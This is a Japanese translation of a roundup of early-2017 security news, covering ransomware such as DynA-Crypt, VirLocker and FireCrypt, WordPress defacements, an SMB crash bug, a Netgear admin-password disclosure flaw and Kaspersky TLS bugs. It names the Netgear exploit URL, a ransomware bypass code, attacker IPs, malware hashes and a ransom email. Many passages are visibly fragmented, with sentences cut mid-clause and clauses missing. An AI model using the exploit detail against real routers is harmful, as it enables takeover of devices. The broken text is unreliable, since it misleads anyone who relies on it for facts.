Microsoftがパッチを遅延させたために、このバグは今月修正されない 
 Myersonは、またしても同じスタンスに立つことができなかった。そのために、Googleは、02月14日(Microsoftがパッチをリリースするパッチの水曜日同日)に、この最新の未パッチのバグを公開した。今月のセキュリティ アップデートを来月まで先延ばしにした 。
このバグはIEとOfficeオンラインのユーザに影響を与える 
 GoogleのJurczykによると、Microsoftがパッチしていないこの問題(CVE-2017-0038として追跡される)は、攻撃者が悪意あるEMFファイルを使用してユーザのメモリの内容を読むことを可能にする。悪いニュースは、EMFファイルは他のドキュメント中に隠すことができるということである。
緩和策は存在しない 
 Googleのセキュリティ エキスパートは、このセキュリティ バグを悪用した攻撃に対する如何なる緩和策も提供していない。16のセキュリティフロー の詳細を公開した。これらの問題は、今回のJurczykの発見とは関連していない。
DynA-Cryptはファイルを暗号化するだけでなく、あなたの情報も盗む  BleepingComputer : News>Security (2017/02/07) 
 DynA-Cryptと呼ばれる新しい身代金要求型マルウェアが、GDataマルウェア解析アナリストKarsten Hahnによって発見された 。この身代金要求型マルウェアは、犠牲者のデータを暗号化するだけでなく、犠牲者のコンピュータから山のような情報も盗む。身代金要求型マルウェアと情報を盗む感染は、ありがちなものであるが、DynA-Cryptのように、この二つをグチャグチャに結合すると、犠牲者のプログラムとデータを台無しにする山のような **** 蒸気を立ち上らせたままにする。
DynA-Cryptは、犠牲者のデータを削除している間に山のような情報を盗む 
 PCrisk によると、このプログラムは、誰もが独自のマルウェアを作成して犯罪者になることを可能にするマルウェア作成キット によって作成されている。これは、誰もが動作するマルウェアを簡単に作成できることを意味しているが、実行していることの意味を知らない人々も同様に、動作するマルウェアを作成できることを意味している。DynA-Cryptは、このケースのように思われる。
・ Screenshots 
 
 このデータが盗まれている時、このマルウェアは、%LocalAppData%\dyna\loot\ と名付けられたフォルダに、盗んだデータをコピーし、開発者に送信する準備ができると、%LocalAppData%\loot.zip と名付けられたファイルに、その全てをZIPで圧縮し、以下に示したように、そのZIPファイルを開発者にeMailする。
 問題は、このマルウェアが犠牲者のデータを盗んだ後、明確な理由もなく盗んだ多くのフォルダを削除するということにある。
 犠牲者のデータを盗むことと、それに関して侮辱することとは別物である。開発者がファイルを削除しても絶対に得るものはない。彼等は得ようとしたものを既に得ている、そして、私は犠牲者を馬鹿にしたところで便益はないと確信している。更に悪いことは、このマルウェアは、デスクトップにあるものを全部削除する。そこから何かを盗むわけでもなく。
DynA-Cryptの身代金要求型マルウェア部分は、復号できる 
 DynA-Crypt身代金要求型マルウェアは、犠牲者のデータを暗号化するためのAESと呼ばれるスタンドアロン プログラムを使用するPowerShellスクリプトによって稼働されている。このスクリプトは、以下の拡張子に一致するファイルに関してコンピュータを検索し、一致したファイルを暗号化する。
.jpg, .jpeg, .docx, .doc, .xlsx, .xls, .ppt, .pdf, .mp4, .mp3, .mov, .mkv, .png, 
 
 このマルウェアは、ファイルを暗号化すると、暗号化したファイル名に .crypt 拡張子を追加する。これは、test.jpg というファイルが暗号化されると test.jpg.crypt にリネームされることを意味している。この身代金要求型マルウェアは、犠牲者のコンピュータのシャドー ボリューム コピーも削除するので、これを使用してファイルを復元するのは不可能である。
DynA-Crypt身代金要求型マルウェア
 良いニュースは、DynA-Cryptの身代金要求型マルウェア部分は、簡単に復号することができるので、このプログラムに感染しても身代金を支払う必要は全く無い。あなたが、この身代金要求型マルウェアに関して支援を必要とするのであるのなら、此処にコメントを残しなさい。復号プログラムが提供されるだろう。
【訳者より】この復号プログラムを取得するには 
1/ 以下のサイトにアクセスする。
2/ 記事本文の下にある Post a Commentにある Register Now をクリックしてユーザ登録を行う。
3/ 再び、このサイトに戻り、Register Now の上にある Login ボタンを押しログインする。
4/ 必ず英文でコメントする。
 
5/ 以下、BleepingComputer担当者の指示に従う。
 
67000を超えるWebサイトが最近パッチされたWordPressのバグで改変されている  BleepingComputer : News>Security (2017/02/07) 
時系列での、REST APIフローを介した改変の試み
 攻撃者はWordPressのREST API中の脆弱性(WordPressチームがほぼ二週間前に修正したが、彼等は、この月曜日に詳細を公開 した)を悪用している。
67000を超えるWebサイトが既に改変された 
 この脆弱性はWordPress 4.7.0と4.7.1に影響を与えるだけであり、このCMSがセキュリティ問題に関して自動アップデートの機能を組み込んでいるにも拘わらず、多くのWebサイトでアップデートされていない。
  
    グループ名 
    IP 
    見積もられる犠牲者数 
     
  
    w4l3XzY3
     
    176.9.36.102 
    66000
     
     
    Cyb3r-Shia	
     
    37.237.192.22
     
    500
     
     
    By+NeT.Defacer
     
    144.217.81.160
     
    500
     
     
    By+Hawleri_hacker	
     
    144.217.81.160
     
    500
     
   
 
 この攻撃は数日間続いたので、Googleは、これら改変されたサイトの一部をインデックスすることを始めてしまっていた。
Googleによってインデックスされた改変されたWebサイト
 現在、Webサイトを改変するためにREST APIを使用しているグループは、彼等のブランドを人目に晒すためだけに実行している(彼等の名前を追加することによってページタイトルと彼等のコンテンツに変更しているだけ)。
改変されたサイトの一つ
 SucuriのCTO,Daniel Cidは、リンクや画像のようなより複雑なコンテンツを投稿するために脆弱性を利用したSEO(検索エンジン最適化)スパムグループのような専門的な改変者が囲いの中に入るのを見るだろうと予測している 。
新たなSMBバグ: Link of Death(死のリンク)でWindowsシステムはクラッシュする  The Register : Security (2017/02/04) 
 火曜日、US CERTは現在サポートされているWindowsの全てのバージョンに、遠隔からコンピュータをクラッシュさせるために悪用することができるメモリ損壊のバグに対する脆弱性があると警告するセキュリティ アドバイザリ をリリースした。SMB2 TREE_CONNECT応答 構造体で定義される構造に従い、大変多くのバイトを含む特別に細工されたサーバの応答を適切に操作することに失敗する」、続けて「悪意あるSMBサーバに接続することによって、脆弱性のあるWindowsクライアント システムは、mrxsmb20.sys中でクラッシュ(BSOD)する」と、US CERTは発言している。Laurent Gaffie (eにウムラウト)がThe Registerに告げたところによると、このバグはNULLポインタ デリファレンスに関係している。彼とMicrosoftは共に、この問題が、遠隔からのdenial of service(DoS)攻撃を導くことを潜在的に意味しているが、遠隔からのコード実行は意味していないと考えている。LLMNR 被毒を介して)もしくは、UNCリンクを介して遠隔からの何れかでターゲットを再起動するために使用される。SDLC プロセスによって捕獲されなければならなかったが、驚くことに捕獲されなかったことに注意することは重要である。」 続けて、「これは、新しいコードベースが、Microsoftの最新のオペレーティングシステムを出荷する前に、単純に検証されていないことを意味している」と、Gaffieは発言している。脆弱性の概念実証 をリリースしている。
多くのNetgearルータにパスワードを盗まれるセキュリティホールが発見された  ESET : We Live Security (2017/01/31) 説明している 。代わりに、彼はベッドの中にいて、アクセスパスワードを忘れた時に、そのデバイスのWeb管理者パネルに侵入する方法があるか否かを調査した。
 Webパネルにアクセスすることを試みると、ユーザは、認証を求められる。この認証をキャンセルすると、パスワードの復元は許可されない。ユーザはパスワード復旧トークンを露出するページにリダイレクトされる。ユーザが、このページ http://router/passwordrecovered.cgi?id=TOKEN(そして、パスワードの復元は許可されない)に正しいトークンを提供すると、彼等はルータ用の管理者パスワードを受け取る。
 明らかになったことによると、このルータの管理者パスワードは、攻撃者が正当なパスワード復旧トークンを送信しない場合でさえ取得することができる。 
 あなたがどのようなパラメータを送っても、passwordrecovered.cgiへの第一のコールは、証明書を渡すことであることを、私は発見した。これは、私が他の如何なる場所でも見たことのない完全に新しいバグである。私は、異なるNetgearのモデルで、この二つのバグをテストした時、私の二つ目のバグは、大変幅広いモデルで動作することを発見した。
 Keninは、同じWi-Fiネットワーク上にいるのに、このルータが、このフローに弱いことを公表したことは拙いことだが、彼が決定したことは、このルータのリモート マネージメント用のオプションが許可されていた場合、この脆弱性は悪意ある攻撃者によって遠隔から悪用されることが可能であるということである。サポート アドバイザリ で、Netgearは、ユーザが、彼等のルータのファームウェアを完全にアップデートしていることを確認するように推奨している。
AC1450 V1.0.0.34_10.0.16 (最新版)
 先月、我々は、Netgearルータを遠隔から悪用できる様々な方法 を、CERTが警告していることをレポートした。Bugcrowdバグ報奨金サービス (脆弱性研究者が、その会社のセキュリティ チームとより簡単に情報交換し、彼等が発見し、責任を持って公開したフローの詳細に関して報奨を得るためのメカニズムを提供するもの)に参加していた。
VirLockerは、以前より悪性になって回帰している。復号可能  BleepingComputer : News>Security (2017/01/18) VirLock 、VirRansom としても知られる)は、2014年に最初にBleeping Computerによって発見 され、当初、Operation Global Ⅲとして参照された身代金要求型マルウェア ファミリーである。2016年のもの や、今週Malwarebytesが発見 したもの)は現れ続けていた。
或るコードでVirLockerは削除できる 
 長期に渡りBleeping Computerのフォーラムで活躍しているユーザであり、Malwarebytesのセキュリティ研究者Nathan Scottによると、この最近のバージョンは、特定の復号プログラムなしに打ち負かすことができる、としている。
0000000000000000000000000000000000000000000000000000000000000000
 このコードは、この身代金要求型マルウェアを欺き、犠牲者が身代金を支払ったと思い込ませる。しかし、ユーザの作業は未だ終了していない。まだ始まったばかりである。
VirLockerは、全てのファイルを暗号化し実行ファイルの内部に格納する 
 VirLockerの感染プロセスは、2014年当時と殆どの部分で同じである。犠牲者のファイルを奪い、これをEXE Shell内部に包み込む。これは、全てのファイルが暗号化され、次に実行ファイルとして詰め直されることを意味している。
あなたの全ファイルを復号するには時間がかかるだろう 
 Scottは、64個の 0 を入力した犠牲者は、直ちに彼等の全ての重要なファイル(確保しておきたいファイル)を開き始めなければならない、と発言している。
犠牲者はオリジナルのファイルを取り戻したら、ハードドライブからファイルを完全に消し去る必要がある 
 犠牲者が、この操作を終了したら、犠牲者は、生きているVirLocker身代金要求型マルウェアを含む如何なるEXEバージョンもコピーしないように細心の注意を払って、彼等のオリジナル ファイルの全てをバックアップ ドライブに移動しなさい。危険なEXEロック ファイルを一つでもコピーすることは、新しいホストにVirLocker感染を拡散することになるか、後で、そのPCを再感染させるかの何れかになる。
Chromeのユーザは、新たな"Font Wasn't Found"(フォントが見つかりません)テクニックでマルウェアの標的にされていた  BleepingComputer : News>Security (2017/01/18) 
Google Chromeでのポップアップ。疑わしいフォント アップグレードパッケージをダウンロードするように要請している
 Google Chromeのユーザは、彼等のブラウザのフォント アップグレードパッケージ(まず間違いなく、マルウェアが混入されている)をダウンロードするように、彼等を欺こうとするWebサイトに警戒する必要がある。
攻撃者はHTMLタグを置き換え、Webページを破壊している 
 このテクニックは、攻撃者がWebサイトをセキュリティ侵害し、そのサイトのソースコードに独自のスクリプトを追加することに依存している。
ChromeユーザをターゲットにしているEITest感染経路
 Proofpointによると 、このテクニックは、EITest感染経路の一部として、通常ハックされたサイトで発見される。EITestは、pseudo-Darkleech (擬似Darkleech(【訳注】 何千というApacheサーバに感染する、2012年に始まった攻撃の名前))と類似のマルウェア感染経路に与えられたニックネームである。
Chromeユーザは、Fleercivetクリック詐欺マルウェアに感染させられる 
 これら最近のChromeユーザへの"font wasn't found"攻撃は、彼等がダウンロードボタンをユーザがクリックすることに依存しているために、同じハイレベルでの感染の成功を保証している他の脆弱性悪用キットとは異なっている。
CryptoSearch: 身代金要求型マルウェアによって暗号化されたファイルを発見し、新しい場所に移動するツール  BleepingComputer : News>Security (2017/01/15) 
 セキュリティ研究者Michael Gillespieが、身代金要求型マルウェアに感染した犠牲者を支援するための新しいWindowsアプリケーションを開発した。
CryptoSearchは、ID Ransomewareと共同して作業する 
 内容を具体的に見ると、CryptoSearchは、ID Ransomeware サービスと提携して作業している、これは、あなたがこのアプリケーションを実行している時、オンラインにいる必要がある。(【UPDATE】 この記事が公開された後、程なくして、Offline Modeのサポートが追加された)
 「このプログラムは、私が提供するID Ransomewareによって稼働されている、そこで、最新の判明した身代金要求型マルウェアとそのシグネチャーで、常に定義ファイルがアップデートされる」と、Gillespieは、本日、彼が公式にこのアプリケーションを起動した場所であるBleeping Computerフォーラムに記述しいている。
 CryptoSearchが、全てのファイルを特定すると、ユーザは、メニューでプロンプトされ、ファイルを移動しコピーしたいのか否か尋ねられ、次に、暗号化されたデータを何処に保管するのか尋ねられる。
 CryptoSearchは現在、ベータ開発ステージである、これは将来より多くの機能が追加されることを意味している。Bleeping Computerのフォーラム トピック に目を光らせておく必要がある。CryptoSearchは、コチラからダウンロード できる。
気をつけろ! 死から復活した非常なマルウェアは、今、仮想マシン・キラーである  Fossbytes : Security (2017/01/11) 
 概要: Palo Alto Networksのセキュリティ研究者は、2011年にSaudi Aramco(【訳注】 サウジ・アラムコ、サウジアラビア国営の石油会社)の35000のマシンを攻撃したShamoon類似のマルウェアの二つのバージョンを発見した。Second Shamoon 2として知られる、この最新のバージョンは、2016年11月に発見された。これは、サイバースパイ活動を引き起こし、標的のネットワーク上で動作している仮想マシンにダメージを与えることが知られている。
 サイバースパイ活動として知られる悪名高きShamoon(別名 Disttrack)マルエウェアが復活した。そして、以前より進歩し、仮想マシンを削除する能力を加えている。
MBRを変更され、OSを発見できなくなっているシステム
 Shamoonは、サウジアラビアを本拠とするSaudi Aramco石油会社を攻撃するために使用され、35000のマシンに影響を与えた2012年が初出のようである。これらのマシンをオンラインに復帰させるために、凡そ一週間を要した。'Shamoon 2' と名付けられた、このShamoonマルウェアの新たなインスタンスに光が当てられたのは2016年11月である。このマルウェアは、サウジアラビアを本拠とする他の企業を攻撃するために使用され、2016年11月17日に、システムを削除するように設定されていた。発見された 。そして、これもまたサウジアラビアをターゲットにしていた。この研究者は、Second Shamoon 2が、犠牲者の組織に関連したハードコードされたアカウント認証を含んでいることに気がついた。この挙動は、先行したShamoon 2では観られていない。ブログ ポスト を読みなさい。
二つの攻撃的キャンペーンに、疑うことを知らないユーザをフィッシングしようとするGoogle Adsが検出された  BleepingComputer : News>Security (2017/01/11) 
過度に攻撃的な広告を挿入するためにサイトをハッキングする
 
 一つ目のキャンペーンは、Sucuri(Webセキュリティに特化された企業)のセキュリティ研究者によって検出された。
過度に攻撃的なGoogle AdSense広告
 これらのサイトの所有者は、この広告パネルが表示される方法を発見するための難しい時期を持った。Sucuriによると、攻撃者はサイトをセキュリティ侵害し、Webサイトのソースコード内に手動でJavaScriptコードを挿入するか、自動的にJavaScriptコードをロードするために、コアCMSファイルを変更した。
クリックベイト ブログはアダルトポータルを装い、ユーザのクリックを収穫している
 
【訳注】 クリックベイト(Clickbait): わざと扇情的な見出しや刺激的なサムネイル画像をつけてネットユーザーのクリックを誘うウェブページやリンクや動画や広告などのこと(英語ネットスラング辞典より)
 AdSense広告を攻撃的に押し付けてくる二つ目のキャンペーンは、Malwarebytesによって発見された、そして、このキャンペーンはハッキングされたWebサイトに関係していなかった。
ユーザを欺き非表示の広告をクリックさせようとしているインチキのアダルト・ポータル
 基本的に、そもそもアダルトサイトを訪問したくないユーザは、ビデオ以外のところで遊ぼうとするが、実際には非表示の広告をクリックしている。
盗まれていたHello Kittyファン330万のデータがオンラインに公開された  Sophos : Hot for Security (2017/01/11) 明らかにした 。これはSanrioが、公にアクセス可能なMongoDB上に重要なアカウントの詳細を放置したままにしたことにあった。
 「更に、新しいセキュリティ基準が、このサーバに適用される。そして、我々は、この事件の内部調査とセキュリティ検証を実施する。会社の現在の認識としては、盗まれたり、晒されたりしているデータはない。」
 一年前に戻ってみると、我々は、あまりに楽観的であったかのようである。レポート として、3,345,168ユーザのデータベースがオンラインに晒された。これは、結局、十分に安全が確保されていないデータを入手していた者が「実行」したことを示している。MongoDBデータベースの大変多くの誤った設定 のために、多くの組織が、認証されていないユーザに、そのデータベースを開き放なしのままにされていることを学習している。
ブラウザの自動補完機能が、新しいフィッシング攻撃で個人情報を盗むために使用されていた  The Guardian : Technology (2017/01/10) LastPassのようなユーティリティ を欺いて、プロファイルに基づいた自動補完システムを介してユーザの個人情報を与えることができることを発見した 。
Viljami KuosmanenのTwiiter(デモンストレーション付き) 
 Kuosmanenは、ユーザ名とeMailアドレス用のテキストボックスを表示し、Chromeによって自動補完される非表示の住所と電話番号用のテキストボックスの付いたサイトを立ち上げ 、この問題をデモンストレーションしている。Mozillaの主幹セキュリティエンジニアDaniel Veditzは、発言している 。しかしながら、より完成された自動補完システムが、Firefox用に現在開発されている。
FireCrypt身代金要求型マルウェアがDDoSコンポーネントを搭載  BleepingComputer : News>Security (2017/01/04) MalwareHunterTeam によって発見された。以下は、MalwareHunterTeamとBleepingComputerのLawrence Abramsによって提供された、この身代金要求型マルウェアの動作モードの解析である。
FireCryptは、身代金要求型マルウェア構築キットを感じさせる 
 マルウェアは通常ソースコードからコンパイルすることで、あるいは、特定のインプット パラメータを取り、作戦ベースでカスタマイズされたマルウェア ペイロードを出力する自動化ソフトウェアを使用して生成される。
 このビルダの役割は、EXEファイルをPDFやDOCアイコンで偽装する他に、新しいコンパイル毎に異なるハッシュでファイルを生成するために、この身代金要求型マルウェアのバイナリを僅かに変更することでもある。このテクニックは、標準的なアンチウィルスで検出されることを難しくする「ポリモーフィック マルウェア」と呼ばれるものを作成するために、マルウェア開発者によってしばしば使用される。MalwareHunterTeamによると、「このビルダは大変基本的なので、実際のアンチウィルスに対抗する助けにはならない。
FireCrypt感染プロセス 
 FireCryptの感染プロセスは、この身代金要求型マルウェアの配布者が生成したEXEファイルを起動する際にユーザを欺くための能力で決まる。
 ファイルの暗号化が終了すると、FireCryptは、そのユーザのデスクトップに脅迫文を投下する。
FireCryptの脅迫文
 この脅迫文は、同じMalwareHunterTeamによって昨年の10月14日に発見された Deadly for a Good Purpose身代金要求型マルウェアの脅迫文と殆ど同一のコピーである。
Deadly for a Good Purpose身代金要求型マルウェアの脅迫文(画像をクリックすると拡大します)
 2016年10月に発見された時点では、Deadly for a Good Purpose身代金要求型マルウェアは開発段階であり、そのソースコードは、犠牲者のコンピュータの日付が2017年の日付になる、もしくは、それ以降にだけファイル暗号化プロセスを始めるようになっていた。
画像をクリックすると拡大します
ハードドライブをジャンクファイルで満たすDDoS機能 
 脅迫文を投下した後も、FireCryptは悪意ある挙動を停止しない。このソースコードは、途切れることなくURLに接続し、そのコンテンツをダウンロードし、それを%Temp%フォルダの[random_chars]-[connect_number].htmlと名付けられたファイルに保存する。
FireCryptのDDoS機能
 FireCryptの製作者は、この機能を"DDoSer"と呼んでいるが、これは無理だろう。この犯罪者は数千の犠牲者に感染した後、十分な大きさのDDoS攻撃を仕掛け、当局のWebサイトに何らかの問題を引き起こすことができる。
標的とされているファイル拡張子 
.txt, .jpg, .png, .doc, .docx, .csv, .sql, .mdb, .sln, .php, .asp, .aspx, .html,
FireCrypt身代金要求型マルウェア関連ファイル 
%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\[random_chars].exe - Startup Executable
FireCrypt身代金要求型マルウェア関連ハッシュ 
 BleedGreenビルダ(VirusTotalのスキャンは、現在 2/57  を検出している)
SHA-256: e77df2ce34949eb11290445a411a47fb927e8871e2580897581981d17730032d
 FireCrypt身代金要求型マルウェアのバイナリ サンプル(VirusTotalのスキャンは、現在 13/57  を検出している)
SHA-256:757e3242f6a2685ed9957c9e66235af889a7accead5719514719106d0b3c6fb4
eMailアドレスと支払い用連絡先 
EMAIL: gravityz3r0@sigaint.org
Emsisoftが、Globe身代金要求型マルウェア バージョン3用の復号プログラムをリリースした  BleepingComputer : News>Security (2017/01/04) Emsisoft のFabian Wosar が救出に現れ、Globe身代金要求型マルウェア v.3用の復号プログラムをリリースした。この復号プログラムは、暗号化されたファイルに .decrypt2017 と .hnumkhotep 拡張子を一般的に追加するGlobe身代金要求型マルウェアの変種を復号する。この身代金要求型マルウェアはまた、下の画像に類似した脅迫文を表示する。
Globeの脅迫文
Globe身代金要求型マルウェア v.3 を復号するには 
 あなたが、この身代金要求型マルウェアに感染したのなら、単純に、下のリンクから decrypt_Globe3.exe をダウンロードし、それをデスクトップに保存しなさい。
Decrypt Globe3ダウンロード 
 復号鍵を発見するには、同じファイルの暗号化されたファイルと暗号化されていないファイルの両方を同時に decrypt_Globe3.exe アイコン上にドラッグする必要がある。あなたが一つのファイルの暗号化されたバージョンと暗号化されていないバージョンの両方を選択したら、その両方を、この実行ファイル上にドラッグしなさい。この復号プログラムを使用するためのファイルを見出そうとするなら、C:\Users\Public\Pictures\Sample Pictures フォルダ中に見出されるサンプル画像(【訳注】 あなたのピクチャ フォルダに存在しているサンプル画像。このファイルも暗号化されている場合は、同一のファイルを知人や会社からもらってきてください)を使用することができる。ファイルのサイズに着目し、暗号化されていないサンプル画像と、同じサイズの暗号化されているサンプル画像を選択する。
この復号プログラムにファイルをドラッグする方法
 このプログラムが起動する時、あなたは以下に示すUAC(User Account Control、ユーザアカウント制御)が表示される。先に進むには Yes ボタンをクリックする。
UACプロンプト
 この復号プログラムは、復号鍵を見つけるためにブルートフォース(【訳注】 総当り)を開始する。これには暫く時間がかかるので、我慢されたい。
短い説明文
 鍵がブルートフォースで発見されると、このプログラムは、以下のような新しいウィンドウを表示する。
発見された復号鍵
 この復号鍵でファイルの復号を開始するには、OKボタンをクリックする。そうすると使用許諾書が表示される。続けるには Yes をクリックする。これで、復号されるドライブのリストを表示している、この復号プログラムのメインスクリーンが表示される。(【訳者補注】 暗号化されているファイルが存在するにも拘わらず)そのドライブレターが表示されていない場合には、Add Folderボタンをクリックし手動で、そのドライブレターを追加しなさい。
Globe3復号プログラムのメイン画面
 復号したい全てのフォルダを追加したら、復号プロセスを開始するためにDecryptボタンをクリックする。Decryptをクリックすると、このプログラムは、暗号化されたファイルの全てを復号し、以下のような結果を示す画面で復号状況を表示するだろう。
ファイル復号中
 終了するとResultタブがFinishedを宣言する。あなたのファイルの全てはこれで、復号されているはずである。あなたがこの復号プログラムで作業するための支援を必要としているのであれば、我々のGlobe Ransomware Support Topic で質問しなさい。
KasperskyのHTTPSトラフィック検査システム中に深刻なセキュリティフローが発見された  BleepingComputer : News>Security (2017/01/04) 
Kasperskyセキュリティ製品は、あるユーザに関してHTTPS接続を破壊していた 
 此処がOrmandyが最初の問題を発見した所である。Kasperskyはクローンされたリーフ認証用のキーとして実際の認証のMD5ハッシュ冒頭の32ビットを使用している。バグレポート でOrmandyは説明している。
 Ormandyが発見した二つ目のバグ は、Kaspersky製品がインストールされている各コンピュータにKasperskyが追加しているルート認証の秘密鍵ファイルに関連している。